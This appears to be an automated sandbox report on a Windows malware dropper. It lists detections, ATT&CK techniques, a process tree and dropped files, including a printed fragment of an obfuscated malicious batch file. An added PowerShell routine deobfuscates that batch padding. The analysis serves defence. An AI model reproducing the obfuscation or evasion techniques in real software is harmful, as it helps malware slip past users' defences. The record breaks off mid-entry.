Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Code function: 0_2_00007FF776D18BF4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter | 0_2_00007FF776D18BF4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Code function: 0_2_00007FF776D13D34 GetVersionExA,MessageBeep,MessageBoxA | 0_2_00007FF776D13D34
Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.10.dr | Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
MITRE ATT&CK matrix. Leading numbers are the badge values Joe Sandbox attaches to highlighted (observed) cells, reproduced as extracted; cells without one are the matrix's default entries, not observed behaviour.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Software Packing | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Timestomp | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 Office Application Startup | 211 Process Injection | 1 DLL Side-Loading | Security Account Manager | 115 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 11 Masquerading | NTDS | 231 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 231 Virtualization/Sandbox Evasion | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 231 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 211 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph (ID 1528503, sample XgKnAQpuPM.exe, start date 08/10/2024, architecture WINDOWS, score 92), rendered as a process tree. Numbers after a process name are the graph's created-registry-value / created-file counters, reproduced as extracted:

Start
  signatures: Malicious sample detected (through community Yara rule); Yara detected UAC Bypass using CMSTP; .NET source code contains potential unpacker; 3 other signatures
  DNS: 198.187.3.20.in-addr.arpa
  XgKnAQpuPM.exe (1 3) started
    dropped: C:\Users\user\AppData\Local\...\vclib.bat (DOS)
    cmd.exe (1) started
      signatures: Suspicious powershell command line found; Suspicious command line found
      powershell.exe (30) started
        signatures: Sets debug register (to hijack the execution of another thread); Modifies the context of a thread in another process (thread injection)
        WerFault.exe (20 16) started
      WMIC.exe (1) started
        signature: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
      conhost.exe started
      2 other processes started
  rundll32.exe started

Source | Detection | Scanner | Label | Link
XgKnAQpuPM.exe | 11% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://upx.sf.net | 0% | URL Reputation | safe
https://aka.ms/pscore6 | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
198.187.3.20.in-addr.arpa | unknown | unknown | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6xG | powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.10.dr | false | URL Reputation: safe | unknown
https://aka.ms/pscore6 | powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp, Null.7.dr | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
                            No contacted IP infos
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1528503
                            Start date and time:2024-10-08 00:28:03 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 39s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:XgKnAQpuPM.exe
                            renamed because original name is a hash value
                            Original Sample Name:52c1acdcbb715dd099648b26b98254e8.exe
                            Detection:MAL
                            Classification:mal92.expl.evad.winEXE@14/11@1/0
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 27
                            • Number of non-executed functions: 36
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.189.173.22
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtFsControlFile calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • VT rate limit hit for: XgKnAQpuPM.exe
                            No simulations
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.4572196546028324
                            Encrypted:false
                            SSDEEP:192:AosYUe23mG52c80exqojaVTy78RJlmzuiFkZ24lO8n:p322G528exqoj+TZRrmzuiFkY4lO8n
                            MD5:214AD5BF391B7D24931E0C1CCE2112C0
                            SHA1:577704E3AB7C9F165B40C131D81975A428231E6C
                            SHA-256:E2C7CE4A6E1039616AEA0814FF7BB86719A8A2D44D7520D46320958ED8277ACB
                            SHA-512:AB033CCC6EF8C34B1E5097AC62C3EDF07446BF53FAB83CE3196A3E6640D08746D14623C26C61BBD005063002BC72BC17D84603EFF0D39E95AEE837DA951A7B34
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.1.3.7.5.3.7.6.5.7.5.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.1.3.7.5.5.4.0.6.3.8.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.d.e.0.2.a.2.-.d.2.4.a.-.4.b.a.3.-.8.8.b.b.-.2.7.b.d.6.f.c.5.d.8.9.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.6.e.b.5.f.8.-.a.e.c.d.-.4.d.c.7.-.8.4.5.f.-.4.f.4.d.7.8.6.d.4.f.c.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.1.8.-.0.0.0.1.-.0.0.1.4.-.8.8.f.f.-.a.6.5.2.0.8.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Mon Oct 7 22:29:14 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):844304
                            Entropy (8bit):3.440795532252442
                            Encrypted:false
                            SSDEEP:6144:8aMn0ivwbd7Sk5o3QWgqurn/2YOSA6Q0a442XvvBL+5qyp:8akk5cQXqujESABZ44mhwqy
                            MD5:08941B8A9D2276911F51959527A7545D
                            SHA1:59F22F039975B297EEEC92F5069FAA63B41F0407
                            SHA-256:AF0EADCEA5A99809629843BE9CB635186DBFE57D592C6D6ECFF55E4C70106D8A
                            SHA-512:925A62A9FE1629A3E65F546AF070BEB6812E8DBBBD46E56C3B3D6EB3109F05DA6E1EF4BCB9995C2C245D377FACC758F950B23C5787FDC5DAA7BF128E385E8E0D
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... ........`.g........................h&..........\3..p1......................`.......8...........T............Z..`............d...........f..............................................................................eJ......Pg......Lw......................T............`.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8766
                            Entropy (8bit):3.69397161896257
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJv+jt6YRDShgmfZa72pWE+89bnjnrfppNm:R6lXJGJ6Y1ShgmfQ7gnjrfpK
                            MD5:1E308375DD2055C9E8698DF3F4AD3B9B
                            SHA1:75D4BD0AF8CFB93E253DC91CE56B92B0875A6310
                            SHA-256:8FBFC72B648A334BEA20117B1F179165B68154ADD818BA3EB8CDE12AC6AD16B1
                            SHA-512:317DA11F0BDF5C7A7338BFED46A2AC90AE2DB96B83E91D4E922AC11DE36410919BFF220C9AE37C2EF164C646D0FEDBBB9E9269884B3260321DD4116E26A4ED19
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.5.2.<./.P.i.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4777
                            Entropy (8bit):4.44038908323831
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsVJg771I9hjHyWpW8VYTYm8M4JQ91FKyq8vlpytf3d:uIjfvI7CH7VXJQAWLuf3d
                            MD5:9B3CCF41CC43AE59F126D6434B924BD5
                            SHA1:C107A450CC6F6F6965EE3CB31838A5324711D56F
                            SHA-256:C3928A0EA3F708941C0B5A049860B1D58C11FCD6D90354ABF0E05455EC2FD891
                            SHA-512:0FDA21B712D220386227DB4AAB461B13A778A7DA9F63595D44889858BF1F1364309EC34B4A2AEF5A337695AAC0361A31738C95049780BC09EF6FC1FFEE8D6DFC
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533611" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9713
                            Entropy (8bit):4.940954773740904
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                            Malicious:false
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2824
                            Entropy (8bit):5.4156429020514745
                            Encrypted:false
                            SSDEEP:48:KizsSU4y4RQmFoUL5a+m9qr9t5/78NdgxJZKaVEouYAgwd64rHLjtvz:KizlHyIFKEg9qrh7KYJ5Eo9Adrxz
                            MD5:A1FE3978A33AC854ACEE2B97BBF646BC
                            SHA1:DD8B8BE6A95FA84A99D26FA9434A2B95D8994D0B
                            SHA-256:A1F8CF3444E28114ED9E0B74D10FC8CEB4E2BFC679A9E25781938F7B1278C698
                            SHA-512:F90E27917E57169F2B21F45606F237B98EC418111004457D26B61AB5F08A410E5D235607C852B31FA4C11C0D832FDE3A920183E7C534506DC20C96387BA55AF3
                            Malicious:false
                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                            Process:C:\Users\user\Desktop\XgKnAQpuPM.exe
                            File Type:DOS batch file, ASCII text, with very long lines (5451), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5120251
                            Entropy (8bit):6.031755508710794
                            Encrypted:false
                            SSDEEP:49152:OH8Afj+WOC91s9ol40FVOy9TAJ2/mGRjOQQZxViXKmxf6B7QsD:d
                            MD5:48091A17649D5BE43A163572BF795E92
                            SHA1:2106B9B38666363ED69168497514401BBC81736B
                            SHA-256:31BB62F0E9E7513EF0B83AA8BD21BDA89E654A768C8EEC896A075BE4217C9541
                            SHA-512:7EC98B3AFC1E27095E8430BFBACFA355A83A89DB920DA95BE5D509115F2096D2A9C5FB148BCA603F58362D0820E1536445E962FFB76365FE54E966D0586D851B
                            Malicious:true
                            Preview:@echo off..%^%@%TseMjTlumHyGzrvFzgHkoUqYjWINsRaoSduNkGicRDLmMrgqxboiCMvYcfDmkycvGkOvWIuTYEsKjemRQsprCRMgIwKfcVRtBqFCDLuPGukXtKPYTMwSiKSOyINAXpQdNZjSyKoeYAKhHOMXGMlqyZkQxQdVYURrEhktBWzjxsUIaKhJVPTlezENPs%%^%e%IGtgeItDAEtwJmcTgfCQMJtZjaGmeCwDiBRCdmQZGhGfBsjYcGyImCIZmtWdcgzYhPohvzPUpCjFcoyQQIkxdOqFTSpJpMXzIIXMdcDCQEsKscWYVgntVbUtyJoDjgFCFKXurMNOfHHzvGnQVrNizDDHNEnuOZtKZ%%^%c%eIfCGjsyontvXRwxHRswdbgpGNytafoWzFCELtKEQaopnsGvYqsBsDMcCPVTLZyjZxVspRMnhNFdNQcogcuJMNEVTzcVyRTQBfqQwoghEeuEXJpMMHNIEPwlSZzPOQPqUOBHzmRSVneItaYjkqiQekmMIfXwOrsOodJjhImAPUMrKORRbpEyIYmKCOYtoveEVqtpr%%^%h%cCdIbjyVcUoguzMUgqRZGtJTltQivtuBAmncuZXclHMdfiaERbkdxriISkxHtqzIAMGhlKzgsPNZGFNctlqujrdieEjkCpIVidDsCTshBeKIEicnwuoiZeyiIxcHApEdhRRCbvAASjSfGvEVCWNhbAWdEuKeQLGmAHBMrzlbTOpQltCnThfEBwcGVNYHKwJhCGF%%^%o%UREdLMnmlgRlSxlJFbKdFUQEBEqxehnFODsbDcTPiPvPVMOnlaBBVBtZbZBhvQidSmwpejgDiVVQzbIOPcmdFMJnjsaDALtsGrWJpzjbUYsZFDAZrNrsDexgCjfMjCdwBDjheZyqTljHtKHGRamMubOCUPgguwSrVVxcttUrpbysVQNSCyUiqqcAOHmoSsWwsRLxmFmyfUxsCwGdcoEVC%%^% %bF
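
The preview above shows the dropped vclib.bat's second line starting with %^%@%TseMjTlum...%%^%e%IGtgeIt...%: every %name% refers to a variable that is never defined, and in a batch file cmd.exe expands an undefined variable to nothing, so the junk collapses to "@echo " once the variable references are stripped. The following is an added example written for this page, not code from the report or from the sample. It emulates cmd.exe's batch-mode percent expansion with an empty variable set; $SampleLine is constructed in the same shape as the preview with the long random names shortened, and the file paths in Expand-BatchFile are assumptions.

```powershell
# Emulates how cmd.exe expands %name% while running a batch file (not interactively):
#   %%            -> one literal percent sign
#   %defined%     -> its value
#   %undefined%   -> nothing at all (this is what the obfuscation relies on)
#   a lone '%'    -> dropped
# Argument forms (%0..%9, %*, %~x1) and !delayed! expansion are not emulated.
function Expand-BatchPercent {
    param([string]$Line, [hashtable]$Defined = @{})
    $out = New-Object System.Text.StringBuilder
    $i = 0
    while ($i -lt $Line.Length) {
        if ($Line[$i] -ne '%') { [void]$out.Append($Line[$i]); $i++; continue }
        if ($i + 1 -lt $Line.Length -and $Line[$i + 1] -eq '%') { [void]$out.Append('%'); $i += 2; continue }
        $end = $Line.IndexOf('%', $i + 1)
        if ($end -lt 0) { $i++; continue }
        $name = $Line.Substring($i + 1, $end - $i - 1)   # '^' and the long random names land here
        if ($Defined.ContainsKey($name)) { [void]$out.Append([string]$Defined[$name]) }
        $i = $end + 1
    }
    $out.ToString()
}

# Constructed sample line (same structure as the report's preview, junk names shortened).
$SampleLine = '%^%@%TseMjTlumHyGz%%^%e%IGtgeItDAEtw%%^%c%eIfCGjsyontv%%^%h%cCdIbjyVcUog%%^%o%UREdLMnmlgRl%%^% %bFqwerty%off'
Expand-BatchPercent -Line $SampleLine        # prints: @echo off

# Same pass over a whole file, e.g. a vclib.bat carved from the dropper. Paths are assumptions.
function Expand-BatchFile {
    param([string]$Path, [string]$OutPath, [hashtable]$Defined = @{})
    $lines = [System.IO.File]::ReadAllLines($Path)
    $clean = foreach ($l in $lines) { Expand-BatchPercent -Line $l -Defined $Defined }
    [System.IO.File]::WriteAllLines($OutPath, [string[]]$clean)
    '{0} lines, {1} -> {2} bytes' -f $lines.Count, (Get-Item $Path).Length, (Get-Item $OutPath).Length
}
Expand-BatchFile -Path "$env:TEMP\vclib.bat" -OutPath "$env:TEMP\vclib.clean.bat"
```

If the script does `set` real variables on earlier lines and reads them later, pass them through -Defined; with an empty set, those references would be stripped too. The 5 MB file size and 5451-character lines reported above are almost entirely this padding, so the cleaned output is the place to look for the wmic, findstr and PowerShell command lines that the process list further down shows being launched.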
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.373043305953581
                            Encrypted:false
                            SSDEEP:6144:4FVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguNliL:AV1qyWWI/glMM6kF7Pq
                            MD5:5DAB9691BE7C220324D5551D8BFBCD4B
                            SHA1:350A242B6709F15D703ECD6A26F5F6F93DEEDC88
                            SHA-256:A54D9354AB7CD2A0F58332D960EF4B5E9D573883044ABED9C8C0CE849855D33E
                            SHA-512:3330667C4D923E0FD5EF7C779E05B154A0717206252C3A2283AA43FD419DFA7E28948E22C1BC53052CD53561CA242A2DF24D539D93C2CC548BC7AFACF89CF061
                            Malicious:false
                            Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^xXV.................................................................................................................................................................................................................................................................................................................................................;Ob........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (2734), with CRLF, LF line terminators
                            Category:dropped
                            Size (bytes):3274
                            Entropy (8bit):5.418461420911021
                            Encrypted:false
                            SSDEEP:96:PFHDRfj+87GBzBCxI4kB595f8bymr3DP3lQEifiOj8l2:PvalMI4kB595fi3DPDifiOb
                            MD5:B7D335FB15C206BB25296DAC175C70B5
